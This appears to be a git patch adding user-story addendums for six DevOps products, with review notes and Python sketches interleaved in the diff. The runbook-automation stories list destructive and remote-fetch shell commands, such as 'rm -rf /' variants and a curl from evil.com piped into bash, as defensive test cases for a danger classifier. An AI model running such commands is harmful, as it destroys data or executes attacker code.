From 72a0f26a7bedcfa35448d78bf8228e67379c740a Mon Sep 17 00:00:00 2001
From: Max Mayfield
Date: Sun, 1 Mar 2026 02:27:55 +0000
Subject: [PATCH] Add BMad review epic addendums for all 6 products

Per-product surgical additions to existing epics (not cross-cutting):
- P1 route: 8pts (key redaction, SSE billing, token math, CI runner)
- P2 drift: 12pts (mTLS revocation, state lock recovery, pgmq visibility, RLS leak, entropy scrubber)
- P3 alert: 10pts (HMAC replay, claim-check, out-of-order correlation, free tier, tenant isolation)
- P4 portal: 9pts (partial scan recovery, ownership conflicts, Meilisearch rebuild, VCR freshness, free tier)
- P5 cost: 7pts (concurrent baselines, remediation RBAC, Clock interface, property tests, Redis fallback)
- P6 run: 15pts (shell AST parsing, canary suite, intervention TTL, streaming audit, crypto signatures)

Total: 61 story points across 29 new stories
---
 .../epics/epic-addendum-bmad.md | 64 +++++++++++++++
 .../epics/epic-addendum-bmad.md | 77 ++++++++++++++++++
 .../epics/epic-addendum-bmad.md | 76 +++++++++++++++++
 .../epics/epic-addendum-bmad.md | 76 +++++++++++++++++
 .../epics/epic-addendum-bmad.md | 75 +++++++++++++++++
 .../epics/epic-addendum-bmad.md | 81 +++++++++++++++++++
 6 files changed, 449 insertions(+)
 create mode 100644 products/01-llm-cost-router/epics/epic-addendum-bmad.md
 create mode 100644 products/02-iac-drift-detection/epics/epic-addendum-bmad.md
 create mode 100644 products/03-alert-intelligence/epics/epic-addendum-bmad.md
 create mode 100644 products/04-lightweight-idp/epics/epic-addendum-bmad.md
 create mode 100644 products/05-aws-cost-anomaly/epics/epic-addendum-bmad.md
 create mode 100644 products/06-runbook-automation/epics/epic-addendum-bmad.md

diff --git a/products/01-llm-cost-router/epics/epic-addendum-bmad.md b/products/01-llm-cost-router/epics/epic-addendum-bmad.md
new file mode 100644
index 0000000..8ae3e79
--- /dev/null
+++ b/products/01-llm-cost-router/epics/epic-addendum-bmad.md
@@ -0,0 +1,64 @@
+# dd0c/route — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 1 Addendum: Proxy Engine
+
+### Story 1.5: API Key Redaction in Error Traces
+As a security-conscious developer, I want all API keys scrubbed from panic traces, error logs, and telemetry events, so that a proxy crash never leaks customer credentials.
+
+**Acceptance Criteria:**
+- Custom panic handler intercepts all panics and runs `redact_sensitive()` before logging.
+- Regex patterns cover `sk-*`, `sk-ant-*`, `sk-proj-*`, `Bearer *` tokens.
+- Telemetry events never contain raw API keys (verified by unit test scanning serialized JSON).
+- Error responses to clients never echo back the Authorization header value.
+
+**Estimate:** 2 points
+
+### Story 1.6: SSE Disconnect Billing Accuracy
+As an engineering manager, I want billing to reflect only the tokens actually streamed to the client, so that early disconnects don't charge for undelivered tokens.
+
+**Acceptance Criteria:**
+- When a client disconnects mid-stream, the proxy aborts the upstream connection within 1 second.
+- Usage record reflects only tokens in chunks that were successfully flushed to the client.
+- Disconnect during prompt processing (before first token) records 0 completion tokens.
+- Provider connection count returns to 0 after client disconnect (no leaked connections).
+
+**Estimate:** 3 points
+
+---
+
+## Epic 2 Addendum: Router Brain
+
+### Story 2.5: Token Calculation Edge Cases
+As a billing-accurate platform, I want token counting to handle Unicode, CJK, and emoji correctly per provider tokenizer, so that cost calculations match provider invoices within 1%.
+
+**Acceptance Criteria:**
+- Uses `cl100k_base` for OpenAI models, Claude tokenizer for Anthropic models.
+- Token count for emoji sequences (🌍🔥) matches provider's count within 1%.
+- CJK characters tokenized correctly (each char = 1+ tokens).
+- Property test: 10K random strings, our count vs mock provider count within 1% tolerance.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 8 Addendum: Infrastructure & DevOps
+
+### Story 8.7: Dedicated CI Runner for Latency Benchmarks
+As a solo founder, I want proxy latency benchmarks to run on a dedicated self-hosted runner (NAS), so that P99 measurements are reproducible and not polluted by shared CI noise.
+
+**Acceptance Criteria:**
+- GitHub Actions workflow triggers on pushes to `src/proxy/**`.
+- Runs `cargo bench --bench proxy_latency` on self-hosted runner.
+- Fails the build if P99 exceeds 5ms.
+- Results stored in `target/criterion/` for trend tracking.
+
+**Estimate:** 1 point
+
+---
+
+**Total Addendum:** 8 points across 4 stories
diff --git a/products/02-iac-drift-detection/epics/epic-addendum-bmad.md b/products/02-iac-drift-detection/epics/epic-addendum-bmad.md
new file mode 100644
index 0000000..db98ccc
--- /dev/null
+++ b/products/02-iac-drift-detection/epics/epic-addendum-bmad.md
@@ -0,0 +1,77 @@
+# dd0c/drift — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 2 Addendum: Agent Communication
+
+### Story 2.7: mTLS Revocation — Instant Lockout
+As a security-conscious platform operator, I want revoked agent certificates to be instantly locked out (including active connections), so that a compromised agent cannot continue sending data.
+
+**Acceptance Criteria:**
+- CRL refresh triggers within 30 seconds of cert revocation.
+- Existing mTLS connections from revoked certs are terminated (not just new connections rejected).
+- New connection attempts with revoked certs return TLS handshake failure.
+- Payload replay with captured nonce returns HTTP 409 Conflict.
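Review note on Story 2.7: the replay criterion could be exercised with something like the sketch below. It assumes an in-memory nonce store with a fixed retention window; `NonceStore`, `handle_payload`, the 300-second window, and the 202 success status are all hypothetical and do not come from the patch. A real deployment would probably need a shared store, and a timestamp check so that a nonce cannot be replayed once it has expired from the store.

```python
import time
from typing import Dict, Optional


class NonceStore:
    """Remembers nonces for a fixed window so a replayed payload can be rejected."""

    def __init__(self, ttl_seconds: float = 300.0):  # window length is an assumption
        self.ttl_seconds = ttl_seconds
        self._seen: Dict[str, float] = {}  # nonce -> time it was first seen

    def check_and_record(self, nonce: str, now: Optional[float] = None) -> bool:
        """Return True if the nonce is new (and record it), False if it is a replay."""
        now = time.monotonic() if now is None else now
        # Drop expired nonces so the store does not grow without bound.
        self._seen = {n: t for n, t in self._seen.items() if now - t < self.ttl_seconds}
        if nonce in self._seen:
            return False
        self._seen[nonce] = now
        return True


def handle_payload(store: NonceStore, nonce: str, now: Optional[float] = None) -> int:
    """Return an HTTP status: 202 for a fresh payload, 409 Conflict for a replay."""
    return 202 if store.check_and_record(nonce, now) else 409
```

Passing `now` explicitly keeps the check deterministic in tests; production code would let it default to the monotonic clock.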
+
+**Estimate:** 3 points
+
+---
+
+## Epic 3 Addendum: Drift Analysis Engine
+
+### Story 3.8: Terraform State Lock Recovery on Panic
+As a customer, I want the panic button to safely release Terraform state locks, so that hitting "stop" doesn't brick my infrastructure.
+
+**Acceptance Criteria:**
+- Panic mode triggers `terraform force-unlock` if normal unlock fails.
+- State lock is verified released within 10 seconds of panic signal.
+- Agent logs the force-unlock attempt for audit trail.
+- If both unlock methods fail, agent alerts the admin with the lock ID for manual recovery.
+
+**Estimate:** 3 points
+
+### Story 3.9: pgmq Visibility Timeout for Long Scans
+As a self-hosted operator, I want long-running drift scans to extend their pgmq visibility timeout, so that a second worker doesn't pick up the same job mid-scan.
+
+**Acceptance Criteria:**
+- Worker extends visibility by 2 minutes every 90 seconds during processing.
+- No duplicate processing occurs for scans taking up to 15 minutes.
+- If worker crashes without extending, job becomes visible after timeout (correct behavior).
+
+**Estimate:** 2 points
+
+---
+
+## Epic 5 Addendum: Dashboard API
+
+### Story 5.8: RLS Connection Pool Leak Prevention
+As a multi-tenant SaaS, I want PgBouncer to clear tenant context between requests, so that Tenant A's drift data never leaks to Tenant B.
+
+**Acceptance Criteria:**
+- `SET LOCAL app.tenant_id` is cleared on connection return to pool.
+- 100 concurrent tenant requests produce zero cross-tenant data leakage.
+- Stress test with interleaved tenant requests on same PgBouncer connection passes.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 10 Addendum: Transparent Factory Compliance
+
+### Story 10.6: Secret Scrubber Entropy Scanning
+As a security-first platform, I want the secret scrubber to detect high-entropy strings (not just regex patterns), so that Base64-encoded keys and custom tokens are caught.
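Review note on Story 10.6: a minimal sketch of entropy-based detection, using the thresholds from this story's acceptance criteria (more than 3.5 bits per character on strings longer than 20 characters). The function names and the whitespace tokenization are assumptions for illustration only, not the scrubber's actual design.

```python
import math
from collections import Counter


def shannon_entropy(s: str) -> float:
    """Shannon entropy of the string, in bits per character."""
    if not s:
        return 0.0
    total = len(s)
    return -sum((c / total) * math.log2(c / total) for c in Counter(s).values())


def looks_like_secret(token: str, min_len: int = 20, threshold: float = 3.5) -> bool:
    """Flag tokens longer than min_len whose entropy exceeds the threshold."""
    return len(token) > min_len and shannon_entropy(token) > threshold


def scrub(line: str) -> str:
    """Redact high-entropy tokens. Splitting on whitespace (an assumption)
    also collapses runs of whitespace in the output."""
    return " ".join("[REDACTED]" if looks_like_secret(t) else t for t in line.split())
```

Ordinary words stay below the length cutoff, and long repetitive strings stay below the entropy cutoff, which is why both conditions are checked together.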
+
+**Acceptance Criteria:**
+- Shannon entropy > 3.5 bits/char on strings > 20 chars triggers redaction.
+- Base64-encoded AWS keys detected and scrubbed.
+- Multi-line RSA private keys detected and replaced with `[REDACTED RSA KEY]`.
+- Normal log messages (low entropy) are not flagged as false positives.
+
+**Estimate:** 2 points
+
+---
+
+**Total Addendum:** 12 points across 5 stories
diff --git a/products/03-alert-intelligence/epics/epic-addendum-bmad.md b/products/03-alert-intelligence/epics/epic-addendum-bmad.md
new file mode 100644
index 0000000..5ba62e0
--- /dev/null
+++ b/products/03-alert-intelligence/epics/epic-addendum-bmad.md
@@ -0,0 +1,76 @@
+# dd0c/alert — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 1 Addendum: Webhook Ingestion
+
+### Story 1.6: HMAC Timestamp Freshness (Replay Prevention)
+As a security-conscious operator, I want webhook payloads older than 5 minutes to be rejected, so that captured webhooks cannot be replayed to flood my ingestion pipeline.
+
+**Acceptance Criteria:**
+- Datadog: Rejects `dd-webhook-timestamp` older than 300 seconds.
+- PagerDuty: Rejects payloads with missing timestamp header.
+- OpsGenie: Extracts timestamp from payload body and validates freshness.
+- Fresh webhooks (within 5-minute window) are accepted normally.
+
+**Estimate:** 2 points
+
+### Story 1.7: SQS 256KB Claim-Check Round-Trip
+As a reliable ingestion pipeline, I want large alert payloads (>256KB) to round-trip through S3 claim-check without data loss, so that high-cardinality incidents are fully preserved.
+
+**Acceptance Criteria:**
+- Payloads > 256KB are compressed and stored in S3; SQS message contains S3 pointer.
+- Correlation engine fetches from S3 and processes the full payload.
+- S3 fetch timeout (10s) sends message to DLQ without crashing the engine.
+- Engine health check returns 200 after S3 timeout recovery.
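Review note on Story 1.7: the claim-check round-trip could look roughly like the sketch below. A plain dictionary stands in for the S3 bucket, and `blob_store`, `to_message`, `from_message`, the envelope field names, and the key format are hypothetical. Timeout handling and the DLQ path are deliberately left out.

```python
import json
import uuid
import zlib
from typing import Dict

SQS_LIMIT_BYTES = 256 * 1024  # size limit named in the story

blob_store: Dict[str, bytes] = {}  # hypothetical in-memory stand-in for an S3 bucket


def to_message(payload: dict) -> str:
    """Build the queue message: the payload inline, or a pointer if it is too large."""
    inline = json.dumps({"inline": payload})
    if len(inline.encode("utf-8")) <= SQS_LIMIT_BYTES:
        return inline
    key = f"alerts/{uuid.uuid4()}"  # assumed key format
    blob_store[key] = zlib.compress(json.dumps(payload).encode("utf-8"))
    return json.dumps({"claim_check": key})


def from_message(message: str) -> dict:
    """Resolve a queue message back to the full payload."""
    envelope = json.loads(message)
    if "inline" in envelope:
        return envelope["inline"]
    raw = zlib.decompress(blob_store[envelope["claim_check"]])
    return json.loads(raw.decode("utf-8"))
```

The size check is applied to the full envelope rather than the bare payload, so an inline message can never exceed the limit because of wrapper overhead.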
+
+**Estimate:** 3 points
+
+---
+
+## Epic 2 Addendum: Correlation Engine
+
+### Story 2.6: Out-of-Order Alert Delivery
+As a reliable correlation engine, I want late-arriving alerts to attach to existing incidents (not create duplicates), so that distributed monitoring delays don't fragment the incident timeline.
+
+**Acceptance Criteria:**
+- Alert arriving after window close but within 2x window attaches to existing incident.
+- Alert arriving after 3x window creates a new incident.
+- Attached alerts update the incident timeline with correct original timestamp.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 5 Addendum: Slack Bot
+
+### Story 5.6: Free Tier Enforcement (10K alerts/month)
+As a PLG product, I want free tier tenants limited to 10K alerts/month with 7-day retention, so that the free tier is sustainable and upgrades are incentivized.
+
+**Acceptance Criteria:**
+- Alert at count 9,999 accepted; alert at count 10,001 returns 429 with Stripe upgrade URL.
+- Counter resets on first of each month.
+- Data older than 7 days purged for free tier; 90-day retention for pro tier.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 6 Addendum: Dashboard API
+
+### Story 6.7: Cross-Tenant Negative Isolation Tests
+As a multi-tenant SaaS, I want explicit negative tests proving Tenant A cannot read Tenant B's data, so that confused deputy vulnerabilities are caught before launch.
+
+**Acceptance Criteria:**
+- Tenant A query returns zero Tenant B incidents (explicit assertion, not just "works for A").
+- Cross-tenant incident access returns 404 (not 403 — don't leak existence).
+- Tenant A analytics reflect only Tenant A's alert count.
+
+**Estimate:** 1 point
+
+---
+
+**Total Addendum:** 10 points across 5 stories
diff --git a/products/04-lightweight-idp/epics/epic-addendum-bmad.md b/products/04-lightweight-idp/epics/epic-addendum-bmad.md
new file mode 100644
index 0000000..bb2f503
--- /dev/null
+++ b/products/04-lightweight-idp/epics/epic-addendum-bmad.md
@@ -0,0 +1,76 @@
+# dd0c/portal — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 1 Addendum: AWS Discovery Engine
+
+### Story 1.7: Partial Scan Failure Recovery
+As a catalog operator, I want partial discovery scan failures (timeout, rate limit) to preserve existing catalog entries, so that a flaky AWS API call doesn't delete half my service catalog.
+
+**Acceptance Criteria:**
+- Partial AWS scan (500 of 1000 resources) stages results without committing; all 1000 existing entries preserved.
+- Partial GitHub scan (rate limited at 50 of 100) preserves all 100 ownership mappings.
+- Scan failure triggers admin alert (not silent failure).
+
+**Estimate:** 3 points
+
+---
+
+## Epic 2 Addendum: GitHub Discovery
+
+### Story 2.6: Ownership Conflict Resolution
+As a catalog operator, I want explicit ownership sources (CODEOWNERS/config) to override implicit sources (AWS tags) and heuristics (commit history), so that ownership is deterministic and predictable.
+
+**Acceptance Criteria:**
+- Priority: Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits).
+- Concurrent discovery from two sources does not create duplicate catalog entries.
+- Heuristic inference does not override an explicitly set owner.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 4 Addendum: Search Engine
+
+### Story 4.5: Meilisearch Zero-Downtime Index Rebuild
+As a catalog user, I want Cmd+K search to work during index rebuilds, so that reindexing doesn't cause downtime.
+
+**Acceptance Criteria:**
+- Search returns results during active index rebuild (swap-based rebuild).
+- Rebuild failure does not corrupt the active index.
+- Cmd+K prefix search from Redis cache returns in <10ms.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 8 Addendum: Infrastructure & DevOps
+
+### Story 8.7: VCR Cassette Freshness CI
+As a maintainer, I want VCR cassettes re-recorded weekly against real AWS, so that API response drift is caught before it breaks integration tests.
+
+**Acceptance Criteria:**
+- Weekly CI job (Monday 6 AM UTC) re-records cassettes with real AWS credentials.
+- Creates PR if any cassettes changed (API drift detected).
+- Diff summary shows which cassettes changed and by how much.
+
+**Estimate:** 1 point
+
+---
+
+## Epic 9 Addendum: Onboarding & PLG
+
+### Story 9.6: Free Tier Enforcement (50 Services)
+As a PLG product, I want free tier tenants limited to 50 services, so that the free tier is sustainable.
+
+**Acceptance Criteria:**
+- 50th service creation succeeds; 51st returns 403 with upgrade prompt.
+
+**Estimate:** 1 point
+
+---
+
+**Total Addendum:** 9 points across 5 stories
diff --git a/products/05-aws-cost-anomaly/epics/epic-addendum-bmad.md b/products/05-aws-cost-anomaly/epics/epic-addendum-bmad.md
new file mode 100644
index 0000000..b6d91ca
--- /dev/null
+++ b/products/05-aws-cost-anomaly/epics/epic-addendum-bmad.md
@@ -0,0 +1,75 @@
+# dd0c/cost — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 2 Addendum: Anomaly Detection Engine
+
+### Story 2.8: Concurrent Baseline Update Conflict Resolution
+As a reliable anomaly detector, I want concurrent Lambda invocations updating the same baseline to converge correctly via DynamoDB conditional writes, so that Welford running stats are never corrupted.
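Review note on Story 2.8: a minimal sketch of Welford's running update combined with an optimistic version check. The in-memory `BaselineStore` only imitates the behaviour of a conditional write; it is not the DynamoDB API, and `Baseline`, `version`, `record_observation`, and the retry limit are hypothetical names and values chosen for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Baseline:
    count: int = 0
    mean: float = 0.0
    m2: float = 0.0   # running sum of squared deviations from the mean
    version: int = 0  # assumed optimistic-lock attribute


class ConditionalCheckFailed(Exception):
    """Raised when the stored version no longer matches the expected one."""


class BaselineStore:
    """In-memory stand-in for a table that supports conditional writes."""

    def __init__(self) -> None:
        self._item = Baseline()

    def read(self) -> Baseline:
        return self._item

    def conditional_write(self, new: Baseline, expected_version: int) -> None:
        if self._item.version != expected_version:
            raise ConditionalCheckFailed()
        self._item = new


def welford_step(b: Baseline, x: float) -> Baseline:
    """Fold one observation into the running count, mean, and M2."""
    count = b.count + 1
    delta = x - b.mean
    mean = b.mean + delta / count
    m2 = b.m2 + delta * (x - mean)
    return Baseline(count, mean, m2, b.version + 1)


def record_observation(store: BaselineStore, x: float, max_retries: int = 5) -> Baseline:
    """Apply one observation, re-reading the baseline after every lost race."""
    for _ in range(max_retries):
        current = store.read()  # a fresh read on each attempt
        updated = welford_step(current, x)
        try:
            store.conditional_write(updated, expected_version=current.version)
            return updated
        except ConditionalCheckFailed:
            continue
    raise RuntimeError("baseline update did not converge")
```

The important detail is that a retry recomputes the step from the freshly read baseline rather than re-submitting the stale result, so both observations end up in the final count.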
+
+**Acceptance Criteria:**
+- Two simultaneous updates to the same baseline both succeed (one retries via ConditionalCheckFailed).
+- Final baseline count reflects both observations.
+- Retry reads fresh baseline before re-applying the update.
+
+**Estimate:** 2 points
+
+### Story 2.9: Property-Based Anomaly Scorer Validation (10K runs)
+As a mathematically sound anomaly detector, I want the scorer validated with 10K property-based test runs, so that edge cases in the scoring function are caught before launch.
+
+**Acceptance Criteria:**
+- Score is always between 0 and 100 for any valid input (10K runs, seed=42).
+- Score monotonically increases as cost increases (10K runs).
+- Reproducible via fixed seed.
+
+**Estimate:** 1 point
+
+---
+
+## Epic 3 Addendum: Notification Service
+
+### Story 3.7: Remediation RBAC (Slack Action Authorization)
+As a security-conscious operator, I want only account owners to trigger destructive remediation actions (Stop Instance), so that a random Slack viewer can't shut down production.
+
+**Acceptance Criteria:**
+- Owner role can trigger "Stop Instance" (200).
+- Viewer role gets 403 with "insufficient permissions".
+- User from different Slack workspace gets 403.
+- Non-destructive actions (snooze, mark-expected) allowed for all authenticated users.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 4 Addendum: Customer Onboarding
+
+### Story 4.7: Clock Interface for Governance Tests
+As a testable governance engine, I want time-dependent logic (14-day auto-promotion) to use an injectable Clock interface, so that governance tests are deterministic and don't depend on wall-clock time.
+
+**Acceptance Criteria:**
+- `FakeClock` can be injected into `GovernanceEngine`.
+- Day 13: no promotion. Day 15 + low FP rate: promotion. Day 15 + high FP rate: no promotion.
+- No `Date.now()` calls in governance logic — all via Clock interface.
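Review note on Story 4.7: the injectable clock could be sketched as below. The sketch is in Python for brevity, although the `Date.now()` reference suggests the real code is JavaScript or TypeScript. `FakeClock` and `GovernanceEngine` are named in the story; the `Clock` protocol shape, `should_promote`, `advance`, and the 5% false-positive threshold are assumptions.

```python
from datetime import datetime, timedelta, timezone
from typing import Protocol


class Clock(Protocol):
    def now(self) -> datetime: ...


class FakeClock:
    """Test clock whose time only moves when advance() is called."""

    def __init__(self, start: datetime):
        self._now = start

    def now(self) -> datetime:
        return self._now

    def advance(self, **kwargs: float) -> None:
        self._now += timedelta(**kwargs)


class GovernanceEngine:
    PROMOTION_AGE = timedelta(days=14)  # 14-day auto-promotion from the story

    def __init__(self, clock: Clock, max_fp_rate: float = 0.05):
        self._clock = clock
        self._max_fp_rate = max_fp_rate  # assumed threshold, not from the patch

    def should_promote(self, enrolled_at: datetime, fp_rate: float) -> bool:
        """Promote only when old enough and the false-positive rate is low."""
        age = self._clock.now() - enrolled_at
        return age >= self.PROMOTION_AGE and fp_rate <= self._max_fp_rate
```

A test for the day 13 and day 15 cases can then advance the fake clock instead of sleeping:

```python
start = datetime(2026, 3, 1, tzinfo=timezone.utc)
clock = FakeClock(start)
engine = GovernanceEngine(clock)
clock.advance(days=13)
assert not engine.should_promote(start, fp_rate=0.01)
clock.advance(days=2)
assert engine.should_promote(start, fp_rate=0.01)
assert not engine.should_promote(start, fp_rate=0.50)
```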
+
+**Estimate:** 1 point
+
+---
+
+## Epic 8 Addendum: Infrastructure & DevOps
+
+### Story 8.7: Redis Failure Safe Default for Panic Mode
+As a resilient platform, I want panic mode checks to default to "active" (safe) when Redis is unreachable, so that a Redis outage doesn't accidentally disable safety controls.
+
+**Acceptance Criteria:**
+- Redis disconnect → `checkPanicMode()` returns `true` (panic active).
+- Warning logged: "Redis unreachable — defaulting to panic=active".
+- Normal operation resumes when Redis reconnects.
+
+**Estimate:** 1 point
+
+---
+
+**Total Addendum:** 7 points across 5 stories
diff --git a/products/06-runbook-automation/epics/epic-addendum-bmad.md b/products/06-runbook-automation/epics/epic-addendum-bmad.md
new file mode 100644
index 0000000..f9e6b32
--- /dev/null
+++ b/products/06-runbook-automation/epics/epic-addendum-bmad.md
@@ -0,0 +1,81 @@
+# dd0c/run — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 1 Addendum: Runbook Parser
+
+### Story 1.7: Shell AST Parsing (Not Regex)
+As a safety-critical execution platform, I want command classification to use shell AST parsing (mvdan/sh), so that variable expansion attacks, eval injection, and hex-encoded payloads are caught.
+
+**Acceptance Criteria:**
+- `X=rm; Y=-rf; $X $Y /` classified as Dangerous (variable expansion resolved).
+- `eval $(echo 'rm -rf /')` classified as Dangerous.
+- `printf '\x72\x6d...' | bash` classified as Dangerous (hex decode).
+- `bash <(curl http://evil.com/payload.sh)` classified as Dangerous (process substitution).
+- `alias ls='rm -rf /'; ls` classified as Dangerous (alias redefinition).
+- Heredoc with embedded danger classified as Dangerous.
+- `echo 'rm -rf / is dangerous'` classified as Safe (string literal, not command).
+- `kubectl get pods -n production` classified as Safe.
+
+**Estimate:** 5 points
+
+---
+
+## Epic 2 Addendum: Action Classifier
+
+### Story 2.7: Canary Suite CI Gate (50 Known-Destructive Commands)
+As a safety-first platform, I want a canary suite of 50 known-destructive commands that must ALL be classified as Dangerous, so that classifier regressions are caught before merge.
+
+**Acceptance Criteria:**
+- Suite contains exactly 50 commands (rm, mkfs, dd, fork bomb, chmod 777, kubectl delete, terraform destroy, DROP DATABASE, etc.).
+- All 50 classified as Dangerous — any miss is a blocking CI failure.
+- Suite count assertion prevents accidental removal of canary commands.
+- Runs on every push and PR.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 3 Addendum: Execution Engine
+
+### Story 3.8: Intervention Deadlock TTL
+As a reliable execution engine, I want manual intervention states to time out after a configurable TTL, so that a stuck execution doesn't hang forever waiting for a human who's asleep.
+
+**Acceptance Criteria:**
+- Manual intervention state transitions to FailedClosed after TTL (default 5 minutes).
+- FailedClosed triggers out-of-band critical alert with execution context.
+- Human resolution before TTL transitions to Complete (no FailedClosed).
+
+**Estimate:** 2 points
+
+---
+
+## Epic 5 Addendum: Audit Trail
+
+### Story 5.7: Streaming Append-Only Audit with Hash Chain
+As a compliance-ready platform, I want audit events streamed immediately (not batched) with a cryptographic hash chain, so that tampering is detectable and events survive agent crashes.
+
+**Acceptance Criteria:**
+- Audit event available within 100ms of command execution (no batching).
+- Hash chain: tampering with any event breaks the chain (detected by `verify_chain()`).
+- WAL (write-ahead log): events survive agent crash and are recoverable.
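Review note on Story 5.7: the hash-chain criterion could be prototyped along these lines. Only the name `verify_chain()` comes from the story; SHA-256, the JSON canonicalization, the entry layout, and `append_event` are assumptions. The sketch does not cover the WAL or the 100ms streaming requirement.

```python
import hashlib
import json
from typing import Dict, List

GENESIS = "0" * 64  # assumed placeholder hash for the first entry


def _digest(prev_hash: str, event: Dict) -> str:
    """Hash the previous entry's hash together with a canonical event encoding."""
    canonical = json.dumps(event, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + canonical).encode("utf-8")).hexdigest()


def append_event(chain: List[Dict], event: Dict) -> None:
    """Append an event, linking it to the hash of the entry before it."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS
    chain.append({"event": event, "prev_hash": prev_hash, "hash": _digest(prev_hash, event)})


def verify_chain(chain: List[Dict]) -> bool:
    """Recompute every link; any edited, reordered, or removed middle entry fails."""
    prev_hash = GENESIS
    for entry in chain:
        if entry["prev_hash"] != prev_hash or entry["hash"] != _digest(prev_hash, entry["event"]):
            return False
        prev_hash = entry["hash"]
    return True
```

One limitation worth noting: dropping entries from the tail still verifies, so the latest hash would need to be anchored somewhere outside the agent for truncation to be detectable.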
+
+**Estimate:** 3 points
+
+### Story 5.8: Cryptographic Signatures for Agent Updates
+As a zero-trust platform, I want agent binary and policy updates signed with the customer's Ed25519 key, so that a compromised SaaS cannot push malicious code to customer infrastructure.
+
+**Acceptance Criteria:**
+- Agent rejects binary update with invalid signature.
+- Agent rejects policy update signed only by SaaS key (requires customer key).
+- Agent accepts update with valid customer signature.
+- Failed signature verification falls back to existing policy (no degradation).
+
+**Estimate:** 3 points
+
+---
+
+**Total Addendum:** 15 points across 5 stories